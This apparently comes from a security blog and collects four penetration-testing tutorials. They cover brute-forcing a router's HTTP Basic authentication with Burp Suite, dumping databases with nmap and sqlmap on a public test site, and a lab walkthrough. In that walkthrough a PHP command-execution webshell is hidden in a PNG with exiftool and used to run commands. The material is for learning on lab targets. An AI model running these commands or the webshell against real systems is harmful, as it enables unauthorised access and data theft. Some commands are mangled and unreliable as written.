Hack the Basic HTTP Authentication using Burpsuite

In the context of a HTTP transaction, basic access authentication is a method for a HTTP user agent to provide a user name and password when making a request.

HTTP Basic authentication (BA) implementation is the simplest technique for enforcing access controls to web resources because it doesn’t require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.

The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely encoded with Base64 in transit, but not encrypted or hashed in any way. HTTPS is, therefore, typically preferred used in conjunction with Basic Authentication.

For more details read from wikipedia.org

Attacker: Kali Linux

Target: TP link Router

 In this article I will perform an attack on router and try to bypass its authentication. In order to bypass user authentication page I am going to explore router IP: 192.168.1.1 on browser. Here now you can see it asking for user credential to get inside the control panel of router. 

Now I had just typed the random value for authentication in order to fetch the request through burp suite. So before you sent the request to server turn on the burp suite and select proxy tab then click on intercept is on after then send the user authentication by clicking ok

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlight some value in the last line. Here it tells the type of authentication provided by router is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64

Now time to generate the encoded value for authentication inside the burp suite. Click on action tab select send to intruder for brute attack.

Now open intruder frame and click on position. Configure the position where payload will be inserted into request. The attack type determines the way in which the payload assigned to payload position Now select the encoded value of authentication for payload position and click to ADD button on the left side of frame.

The base64 encoded value of Authentication is combination of username and password now the scenario is to generate same encoded value of authentication with help of user password dictionary Therefore I have made a dictionary which contains both user password names in text file and save it on the desktop. Later use this dictionary under burp suite through intruder as payload for brute force attack.

In order to use dictionary as payload click on payload tab under intruder; now load your dictionary which contains user password names from payload options. But we want to send request in encoded value of our payload. To encode your payload click on ADD button available under payload processing

A new dialog box will generate to select the rule choose encode option from list; now select base 64 from drag down list of URL encode key character for payload processing.

This will start brute force attack and try to match string for user authentication. In screenshot you can the status and length of the highlighted value is different from rest of values. This means we can use this encoded value to bypass the user authentication which occur from request number 6. Now check the username and password of 6th line in dictionary. In dictionary I found admin: ps******** have matching authentication.

Now again open the router IP and this time type the above username and password. From screenshot you can see I have successfully login in control panel of router.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Exploiting Sql Injection with Nmap and Sqlmap

This article is about how to scan any target for sql injection using NMAP and then exploit the target with sqlmap if NMAP finds the target is vulnerable to sql injection. Now go with this tutorial for more details.

Firstly Type www.vulnweb.com in URL to browse acunetix web application. Then Click the link given for the URL of Acuart as shown in screenshot.

Here the required web page will get opened; testphp.vulnweb.com is our targeted host and now scans this target using nmap to identifying the possibilities of sql injection.

NMAP has NSE Script for http sql injection vulnerabilities and scan the web application for sql injection.

Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.

The script spiders an HTTP server looking for URLs containing queries. It then proceeds to combine crafted SQL commands with susceptible URLs in order to obtain errors. The errors are analyzed to see if the URL is vulnerable to attack. This uses the most basic form of SQL injection but anything more complicated is better suited to a standalone tool.

We may not have access to the target web server’s true hostname, which can prevent access to virtually hosted sites.

Now type the following command to scan the target for sql injection possibilities.

nmap -sV  –script=http-sql-injection www. testphp.vulnweb.com –p 80

 From the screenshot you can perceive that it has dumped the possible sql injection for queries. Now let’s explore this query in browser.

Note: please remove http:// from resultant queries while browsing.

This page contains some message or warning related to some kind of error in database query.  Now let’s try to apply sql injection using above resultant sqli query of NMAP inside sqlmap and try to figure out whether the result from nmap is correct for sql injection vulnerability or not.

Open the terminal in kali Linux and type following command for sqlmap

sqlmap -u http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider –dbs –batch

We have got database name from the above resultant sqli query of NMAP inside sqlmap. You can read the database name acuart from the given screenshot.

Now try to find out entire data under this URL by typing following command.

sqlmap -u http://testphp.vulnweb.com/search.php?test=query%27%200R%20sqlspider –D acuart –dump-all

This will dump all available information inside the database. Now try it by yourself.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Easy way to Hack Database using Wizard switch in Sqlmap

Sqlmap provides wizard options for beiggner  and save your much time. So start your kali Linux and open the terminal and now the following command to use wizard interface of sqlmap.

sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” –wizard

Type 1 for normal; to select the injection difficulty. Now again type 1 for basic enumeration.

It will automatically dump the basic detail of backend server. Here you can see from the given screenshot it shown that web application technology is nginx , PHP 5.3.10 and operating system is Linux Ubuntu and many more things. 

Now change level for penetration testing of web with sqlmap wizard. Again type the same command.

sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” –wizard

Type 2 for medium; to select the injection difficulty. Now again type 2 for intermidate enumeration.

Wonderful!!!  We have got database name and all table names with columns.

Now again change level for penetration testing of web with sqlmap wizard. Repeat the same command.

sqlmap -u “http://testphp.vulnweb.com/listproducts.php?cat=1” –wizard

 Type 3 for hard; to select the injection difficulty. Now again type 3 for All enumeration.

Awesome within three steps we have got entire information of acurat database. You can see the result from the screenshot.

Here we have all tables with its field details and column details.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Today we are going to perform penetration testing with part II of previous lab, download it frohere. Now install the iso image in VM ware and start it. In this lab task level is intermediate and challenge is to gain access of administration console and then upload a PHP webshell.

Start Kali Linux then open the terminal and type netdiscover command for scanning network. Here 192.168.1.102 is my target IP which is shown in the screenshot. Now explore this IP in browser.

When you will open target IP in browser you will get a web page having heading My Awesome Photoblog. On the top of left side it contains some tags: home; test; ruxcon; 2010; all pictures; admin. Now Click on test.

The given URL: http://192.168.1.102/cat.php?id=1 will run sql query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding(‘) apostrophe at last of URL:

http://192.168.1.102/cat.php?id=1as it is not vulnerable. I didn’t get any error message like I have got in its part 1then I try to find out whether the other IDs is vulnerable or not but here also I found nothing. 

Now use nikto to scan the target for any vulnerability and type following command.

Nikto –h 192.168.1.102

 Look over the highlighted part in screenshot; from the result, it tells that X-Content-Type-Option header is not set.

Then I had used acunetix to scan the target which has declared the level of threat is high for blind sql injection.

Hence it is clear that exploit the target through sql injection.

Now type the following command for blind sql injection using sqlmap

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –dbs –batch

 Now try sql injection for header; the target application might be designed with X-Forwarded-For header which is used to run application behind a reverse-proxy.

Our assumption is correct above header is vulnerable to sql injection and I have got database name photoblog.

Now let’s fetch entire data under photoblog database through following command:

sqlmap -u “http://192.168.1.102/cat.php?id=1″ –headers=”X-Forwarded-For: *” –D photoblog –dump-all –batch

Here Task was to gain access of administration console for which we required the login: password of his account. Through sqlmap command we have got login as admin and password as P4ssw0rd.

Now try to use above credential to access administration console, again open target IP: 192.168.1.102 in browser and click on admin tab present on the top of left side and type login as admin and password as P4ssw0rd.

Congrats!!! The first task is completed.

Now last task is to upload a PHP webshell. Under administration console you will notice a link Add a new picture for uploading an image in this web server. Click on Add a new picture to upload image.

Here we can upload image through Add option now I will try to upload PHP webshell

I try to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.

Then I had used exiftool for hiding the malicious code inside the png image. For this step you need to download an image and save it on desktop now prepare a php file by typing following malicious code in a text file to create command injection vulnerability and save it with .php extension as I have saved with raj.php on the desktop.

<?php $cmd=$GET[‘cmd’]; system($cmd); ?>

 Now type command for exiftool to hide malicious code of php file inside the png image

Cd Desktop

Exiftool “-comment<=raj.php” 1.png

Exiftool 1.png

 From screenshot you can perceive I have three files on desktop one for php as raj.php another for downloaded image as 1.png original and third php webshell as 1.png

Now I had browse 1.png to add it as new image which is our php webshell.

Our malicious file successfully uploaded on web server. You can see a new row is added as webshell php which contains our backdoor raj.php, now click on webshell php.

Here is our malicious image; now right click on it and click view image tag.

Here this image will get opened in separate window and if you remembered its contains malicious code of command injection.

Here I try to execute ls command by adding /cmd.php?cmd=ls/etc at the end of the URL and from screenshot you can analysis this page is encoded.

Now last option is to use repeater under burp suite to execute the commands. Start burp suite and set manual proxy of browser then open the web page where “you are hacked image” is uploaded.

Now capture the cookies through burp suit and sent the intercepted data to repeater option by making right click on its window.

Now change the header from /show.php?id=4 into /admin/uploads/1484502823.png/cmd.php?cmd=ls now click on GO tab to send this request for getting response and when you will scroll down  (response) here I found some information through ls command.

Great!!!  We have completed both tasks.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...